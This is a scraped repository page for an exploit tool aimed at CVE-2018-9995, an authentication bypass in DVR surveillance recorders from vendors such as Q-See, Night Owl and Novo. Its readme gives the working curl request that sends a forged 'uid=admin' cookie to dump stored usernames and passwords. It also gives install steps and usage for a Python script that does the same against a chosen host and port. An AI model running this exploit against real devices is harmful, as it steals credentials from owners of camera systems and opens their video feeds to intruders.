ezelf/ CVE-2018-9995_dvr_credentials
Need help with CVE-2018-9995_dvr_credentials?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.
About the developer
459 Stars 
189 Forks 
GNU General Public License v3.0 
13 Commits 
5 Opened issues 
Description
(CVE-2018-9995) Get DVR Credentials
Services available
Contributors list
Readme
[Tool] show DVR Credentiales
[*] Exploit Title: "Gets DVR Credentials" [*] CVE: CVE-2018-9995 [*] CVSS Base Score v3: 7.3 / 10 [*] CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N [*] Date: 09/04/2018 [*] Exploit Author: Fernandez Ezequiel ( twitter:@capitan_alfa )
Exploit:
$> curl "http://:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
tested in DVR (banner/vendor ?):
Novo CeNova QSee Pulnix XVR 5 in 1 (title: "XVR Login") Securus, - Security. Never Compromise !! - Night OWL DVR Login HVR Login MDVR Login
On the Wild:
Possible Banners frontend (web):
Indoor:
TOOL: "Show all DVR Credentials"
Quick start
[email protected]:~$ git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git [email protected]:~$ cd CVE-2018-9995_dvr_credentials [email protected]:~$ pip install -r requirements.txt
help
usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT][+] Obtaining Exposed credentials
optional arguments: -h, --help show this help message and exit -v, --version show program's version number and exit --host HOST Host --port PORT Port
[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81
Pocs (Output) :
Blog:
http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html
I see you... ! xd